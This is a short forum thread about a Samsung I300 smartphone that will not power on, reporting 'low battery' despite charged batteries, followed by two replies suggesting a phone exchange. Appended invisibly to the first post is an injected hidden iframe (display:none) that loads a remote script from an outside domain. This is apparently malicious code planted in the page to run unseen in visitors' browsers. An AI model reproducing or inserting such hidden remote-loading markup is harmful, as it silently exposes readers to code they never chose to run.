Hi everyone,
I have had my I300 for about 5 days. When I got it I followed the charging instructions and let it charge for the required time. The I300 had been working fine up untill this morning. Last night I placed the phone in its cradle to charge overnight.

This morning when I went to log into the net with it, it came back saying that I had a "Web Alert". Well I tried to check the alert by logging into the net but when I tried I got a fatal error and nothing would respond. I had to soft reset the phone and when it would try to turn on the phone it couldnt. When I push the phone button on the right side it comes up saying that the phone is in "low battery "and wont turn it on. Both batteries are fully charged and it is happening with both batteries.

When the Palm part is on it shows a full battery. I tried a hard reset but it still didnt work. When I put the unit in the cradle the charge light will be red for a few minutes but then go to green. Bottom line is, I cant turn on the phone due to a low battery. Anyone ever seen this? Thanks for any help<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I do faintly recall some talk of this. If I'm not mistaken the person exchanged their I300.

I had the same problem, Neither samsung or sprint could figure it out. Exchanged the phone. The sprint tech said it was possessed.

If you exchange it, when you sync up again be carefull what you install.
